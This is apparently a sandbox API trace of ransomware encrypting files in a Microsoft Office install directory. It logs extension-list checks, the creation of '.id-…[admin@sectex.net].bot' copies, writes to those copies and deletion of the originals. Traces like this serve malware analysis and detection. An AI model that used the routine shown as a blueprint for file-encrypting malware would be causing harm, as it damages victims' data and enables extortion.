	[0159.765] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\EXSEC32.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\exsec32.dll")) returned 0x20
	[0159.765] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\EXSEC32.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\exsec32.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0159.765] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\EXSEC32.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\exsec32.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0159.765] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EXSEC32.DLL") returned 54
	[0159.765] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EXSEC32.DLL") returned 54
	[0159.765] lstrlenW (lpString=".doc") returned 4
	[0159.765] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0159.765] lstrlenW (lpString=".docx") returned 5
	[0159.765] lstrcmpiW (lpString1=".docx", lpString2="2.DLL") returned -1
	[0159.765] lstrlenW (lpString=".pdf") returned 4
	[0159.765] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0159.765] lstrlenW (lpString=".xls") returned 4
	[0159.765] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0159.765] lstrlenW (lpString=".xlsx") returned 5
	[0159.765] lstrcmpiW (lpString1=".xlsx", lpString2="2.DLL") returned -1
	[0159.765] lstrlenW (lpString=".ppt") returned 4
	[0159.765] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0159.766] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EXSEC32.DLL") returned 54
	[0159.766] lstrlenW (lpString=".zip") returned 4
	[0159.766] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0159.766] lstrlenW (lpString=".rar") returned 4
	[0159.766] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0159.766] lstrlenW (lpString=".bz2") returned 4
	[0159.766] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0159.766] lstrlenW (lpString=".7z") returned 3
	[0159.766] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0159.766] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EXSEC32.DLL") returned 54
	[0159.766] lstrlenW (lpString=".dbf") returned 4
	[0159.766] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0159.766] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EXSEC32.DLL") returned 54
	[0159.766] lstrlenW (lpString=".1cd") returned 4
	[0159.766] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0159.766] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EXSEC32.DLL") returned 54
	[0159.766] lstrlenW (lpString=".jpg") returned 4
	[0159.766] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0159.766] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EXSEC32.DLL") returned 54
	[0159.766] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EXSEC32.DLL") returned 54
	[0159.766] lstrlenW (lpString=".doc") returned 4
	[0159.766] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0159.766] lstrlenW (lpString=".docx") returned 5
	[0159.766] lstrcmpiW (lpString1=".docx", lpString2="2.DLL") returned -1
	[0159.766] lstrlenW (lpString=".pdf") returned 4
	[0159.766] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0159.766] lstrlenW (lpString=".xls") returned 4
	[0159.766] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0159.766] lstrlenW (lpString=".xlsx") returned 5
	[0159.766] lstrcmpiW (lpString1=".xlsx", lpString2="2.DLL") returned -1
	[0159.767] lstrlenW (lpString=".ppt") returned 4
	[0159.767] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0159.767] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EXSEC32.DLL") returned 54
	[0159.767] lstrlenW (lpString=".zip") returned 4
	[0159.767] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0159.767] lstrlenW (lpString=".rar") returned 4
	[0159.767] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0159.767] lstrlenW (lpString=".bz2") returned 4
	[0159.767] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0159.767] lstrlenW (lpString=".7z") returned 3
	[0159.767] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0159.767] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EXSEC32.DLL") returned 54
	[0159.767] lstrlenW (lpString=".dbf") returned 4
	[0159.767] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0159.767] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EXSEC32.DLL") returned 54
	[0159.767] lstrlenW (lpString=".1cd") returned 4
	[0159.767] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0159.767] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EXSEC32.DLL") returned 54
	[0159.767] lstrlenW (lpString=".jpg") returned 4
	[0159.767] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0159.767] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0159.767] lstrlenW (lpString="EXTRACT.DLL") returned 11
	[0159.767] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\EXTRACT.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\extract.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0159.769] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=340904) returned 1
	[0159.769] CloseHandle (hObject=0x1b4) returned 1
	[0159.769] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\EXTRACT.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\extract.dll")) returned 0x20
	[0159.769] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\EXTRACT.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\extract.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0159.769] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\EXTRACT.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\extract.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0159.769] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EXTRACT.DLL") returned 54
	[0159.769] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EXTRACT.DLL") returned 54
	[0159.769] lstrlenW (lpString=".doc") returned 4
	[0159.769] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0159.769] lstrlenW (lpString=".docx") returned 5
	[0159.769] lstrcmpiW (lpString1=".docx", lpString2="T.DLL") returned -1
	[0159.769] lstrlenW (lpString=".pdf") returned 4
	[0159.769] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0159.769] lstrlenW (lpString=".xls") returned 4
	[0159.769] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0159.769] lstrlenW (lpString=".xlsx") returned 5
	[0159.769] lstrcmpiW (lpString1=".xlsx", lpString2="T.DLL") returned -1
	[0159.770] lstrlenW (lpString=".ppt") returned 4
	[0159.770] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0159.770] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EXTRACT.DLL") returned 54
	[0159.770] lstrlenW (lpString=".zip") returned 4
	[0159.770] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0159.770] lstrlenW (lpString=".rar") returned 4
	[0159.770] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0159.770] lstrlenW (lpString=".bz2") returned 4
	[0159.770] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0159.770] lstrlenW (lpString=".7z") returned 3
	[0159.770] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0159.770] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EXTRACT.DLL") returned 54
	[0159.770] lstrlenW (lpString=".dbf") returned 4
	[0159.770] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0159.770] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EXTRACT.DLL") returned 54
	[0159.770] lstrlenW (lpString=".1cd") returned 4
	[0159.770] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0159.770] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EXTRACT.DLL") returned 54
	[0159.770] lstrlenW (lpString=".jpg") returned 4
	[0159.770] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0159.770] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EXTRACT.DLL") returned 54
	[0159.770] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EXTRACT.DLL") returned 54
	[0159.770] lstrlenW (lpString=".doc") returned 4
	[0159.770] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0159.770] lstrlenW (lpString=".docx") returned 5
	[0159.770] lstrcmpiW (lpString1=".docx", lpString2="T.DLL") returned -1
	[0159.770] lstrlenW (lpString=".pdf") returned 4
	[0159.770] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0159.770] lstrlenW (lpString=".xls") returned 4
	[0159.770] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0159.770] lstrlenW (lpString=".xlsx") returned 5
	[0159.771] lstrcmpiW (lpString1=".xlsx", lpString2="T.DLL") returned -1
	[0159.771] lstrlenW (lpString=".ppt") returned 4
	[0159.771] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0159.771] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EXTRACT.DLL") returned 54
	[0159.771] lstrlenW (lpString=".zip") returned 4
	[0159.771] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0159.771] lstrlenW (lpString=".rar") returned 4
	[0159.771] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0159.771] lstrlenW (lpString=".bz2") returned 4
	[0159.771] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0159.771] lstrlenW (lpString=".7z") returned 3
	[0159.771] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0159.771] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EXTRACT.DLL") returned 54
	[0159.771] lstrlenW (lpString=".dbf") returned 4
	[0159.771] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0159.771] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EXTRACT.DLL") returned 54
	[0159.771] lstrlenW (lpString=".1cd") returned 4
	[0159.771] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0159.771] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EXTRACT.DLL") returned 54
	[0159.771] lstrlenW (lpString=".jpg") returned 4
	[0159.771] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0159.771] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0159.771] lstrlenW (lpString="FACILITY.DLL") returned 12
	[0159.771] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FACILITY.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\facility.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0159.772] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=1621864) returned 1
	[0159.773] CloseHandle (hObject=0x1b4) returned 1
	[0159.773] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FACILITY.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\facility.dll")) returned 0x20
	[0159.773] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FACILITY.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\facility.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0159.773] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\FACILITY.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\facility.dll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\FACILITY.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\facility.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0159.773] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FACILITY.DLL") returned 55
	[0159.773] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FACILITY.DLL") returned 55
	[0159.773] lstrlenW (lpString=".doc") returned 4
	[0159.773] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0159.773] lstrlenW (lpString=".docx") returned 5
	[0159.773] lstrcmpiW (lpString1=".docx", lpString2="Y.DLL") returned -1
	[0159.773] lstrlenW (lpString=".pdf") returned 4
	[0159.773] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0159.773] lstrlenW (lpString=".xls") returned 4
	[0159.773] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0159.773] lstrlenW (lpString=".xlsx") returned 5
	[0159.773] lstrcmpiW (lpString1=".xlsx", lpString2="Y.DLL") returned -1
	[0159.773] lstrlenW (lpString=".ppt") returned 4
	[0159.773] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0159.773] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FACILITY.DLL") returned 55
	[0159.773] lstrlenW (lpString=".zip") returned 4
	[0159.774] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0159.774] lstrlenW (lpString=".rar") returned 4
	[0159.774] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0159.774] lstrlenW (lpString=".bz2") returned 4
	[0159.774] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0159.774] lstrlenW (lpString=".7z") returned 3
	[0159.774] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0159.774] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FACILITY.DLL") returned 55
	[0159.774] lstrlenW (lpString=".dbf") returned 4
	[0159.774] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0159.774] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FACILITY.DLL") returned 55
	[0159.774] lstrlenW (lpString=".1cd") returned 4
	[0159.774] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0159.774] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FACILITY.DLL") returned 55
	[0159.774] lstrlenW (lpString=".jpg") returned 4
	[0159.774] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0159.774] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FACILITY.DLL") returned 55
	[0159.774] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FACILITY.DLL") returned 55
	[0159.774] lstrlenW (lpString=".doc") returned 4
	[0159.774] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0159.774] lstrlenW (lpString=".docx") returned 5
	[0159.774] lstrcmpiW (lpString1=".docx", lpString2="Y.DLL") returned -1
	[0159.774] lstrlenW (lpString=".pdf") returned 4
	[0159.774] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0159.774] lstrlenW (lpString=".xls") returned 4
	[0159.774] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0159.774] lstrlenW (lpString=".xlsx") returned 5
	[0159.774] lstrcmpiW (lpString1=".xlsx", lpString2="Y.DLL") returned -1
	[0159.774] lstrlenW (lpString=".ppt") returned 4
	[0159.774] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0159.774] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FACILITY.DLL") returned 55
	[0159.774] lstrlenW (lpString=".zip") returned 4
	[0159.775] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0159.775] lstrlenW (lpString=".rar") returned 4
	[0159.775] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0159.775] lstrlenW (lpString=".bz2") returned 4
	[0159.775] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0159.775] lstrlenW (lpString=".7z") returned 3
	[0159.775] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0159.775] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FACILITY.DLL") returned 55
	[0159.775] lstrlenW (lpString=".dbf") returned 4
	[0159.775] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0159.775] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FACILITY.DLL") returned 55
	[0159.775] lstrlenW (lpString=".1cd") returned 4
	[0159.775] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0159.775] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FACILITY.DLL") returned 55
	[0159.775] lstrlenW (lpString=".jpg") returned 4
	[0159.775] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0159.775] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0159.775] lstrlenW (lpString="FORM.DLL") returned 8
	[0159.775] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORM.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\form.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0159.961] GetFileSizeEx (in: hFile=0x388, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=239488) returned 1
	[0159.961] CloseHandle (hObject=0x388) returned 1
	[0159.961] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORM.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\form.dll")) returned 0x20
	[0159.961] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORM.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\form.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0159.961] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORM.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\form.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0159.961] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORM.DLL") returned 51
	[0159.961] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORM.DLL") returned 51
	[0159.961] lstrlenW (lpString=".doc") returned 4
	[0159.961] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0159.961] lstrlenW (lpString=".docx") returned 5
	[0159.961] lstrcmpiW (lpString1=".docx", lpString2="M.DLL") returned -1
	[0159.961] lstrlenW (lpString=".pdf") returned 4
	[0159.961] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0159.961] lstrlenW (lpString=".xls") returned 4
	[0159.961] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0159.961] lstrlenW (lpString=".xlsx") returned 5
	[0159.961] lstrcmpiW (lpString1=".xlsx", lpString2="M.DLL") returned -1
	[0159.961] lstrlenW (lpString=".ppt") returned 4
	[0159.962] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0159.962] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORM.DLL") returned 51
	[0159.962] lstrlenW (lpString=".zip") returned 4
	[0159.962] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0159.962] lstrlenW (lpString=".rar") returned 4
	[0159.962] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0159.962] lstrlenW (lpString=".bz2") returned 4
	[0159.962] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0159.962] lstrlenW (lpString=".7z") returned 3
	[0159.962] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0159.962] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORM.DLL") returned 51
	[0159.962] lstrlenW (lpString=".dbf") returned 4
	[0159.962] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0159.964] GetFileSizeEx (in: hFile=0x388, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=789) returned 1
	[0159.964] CloseHandle (hObject=0x388) returned 1
	[0159.964] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\APPT.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\appt.cfg")) returned 0x20
	[0159.964] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\APPT.CFG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\appt.cfg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0159.964] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\APPT.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\appt.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0159.965] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.965] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.965] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\APPT.CFG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\appt.cfg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0160.171] GetLastError () returned 0x0
	[0160.171] ReadFile (in: hFile=0x388, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x315, lpOverlapped=0x0) returned 1
	[0160.321] WriteFile (in: hFile=0x3c4, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x320, lpOverlapped=0x0) returned 1
	[0160.322] ReadFile (in: hFile=0x388, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0160.322] WriteFile (in: hFile=0x3c4, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xe4, lpOverlapped=0x0) returned 1
	[0160.322] SetEndOfFile (hFile=0x3c4) returned 1
	[0160.322] CloseHandle (hObject=0x3c4) returned 1
	[0160.322] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.322] SetEndOfFile (hFile=0x388) returned 1
	[0160.324] CloseHandle (hObject=0x388) returned 1
	[0160.324] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\APPT.CFG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0160.324] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\APPT.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\appt.cfg")) returned 1
	[0160.327] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\APPT.CFG") returned 62
	[0160.327] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\APPT.CFG") returned 62
	[0160.327] lstrlenW (lpString=".doc") returned 4
	[0160.327] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1
	[0160.327] lstrlenW (lpString=".docx") returned 5
	[0160.327] lstrcmpiW (lpString1=".docx", lpString2="T.CFG") returned -1
	[0160.327] lstrlenW (lpString=".pdf") returned 4
	[0160.327] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1
	[0160.327] lstrlenW (lpString=".xls") returned 4
	[0160.327] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1
	[0160.327] lstrlenW (lpString=".xlsx") returned 5
	[0160.327] lstrcmpiW (lpString1=".xlsx", lpString2="T.CFG") returned -1
	[0160.327] lstrlenW (lpString=".ppt") returned 4
	[0160.327] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1
	[0160.327] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\APPT.CFG") returned 62
	[0160.327] lstrlenW (lpString=".zip") returned 4
	[0160.327] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1
	[0160.327] lstrlenW (lpString=".rar") returned 4
	[0160.327] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1
	[0160.327] lstrlenW (lpString=".bz2") returned 4
	[0160.327] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1
	[0160.327] lstrlenW (lpString=".7z") returned 3
	[0160.327] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1
	[0160.327] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\APPT.CFG") returned 62
	[0160.328] lstrlenW (lpString=".dbf") returned 4
	[0160.328] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1
	[0160.328] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\APPT.CFG") returned 62
	[0160.328] lstrlenW (lpString=".1cd") returned 4
	[0160.328] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1
	[0160.328] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\APPT.CFG") returned 62
	[0160.328] lstrlenW (lpString=".jpg") returned 4
	[0160.328] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1
	[0160.328] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\APPT.CFG") returned 62
	[0160.328] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\APPT.CFG") returned 62
	[0160.328] lstrlenW (lpString=".doc") returned 4
	[0160.328] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1
	[0160.328] lstrlenW (lpString=".docx") returned 5
	[0160.328] lstrcmpiW (lpString1=".docx", lpString2="T.CFG") returned -1
	[0160.328] lstrlenW (lpString=".pdf") returned 4
	[0160.328] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1
	[0160.328] lstrlenW (lpString=".xls") returned 4
	[0160.328] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1
	[0160.328] lstrlenW (lpString=".xlsx") returned 5
	[0160.328] lstrcmpiW (lpString1=".xlsx", lpString2="T.CFG") returned -1
	[0160.328] lstrlenW (lpString=".ppt") returned 4
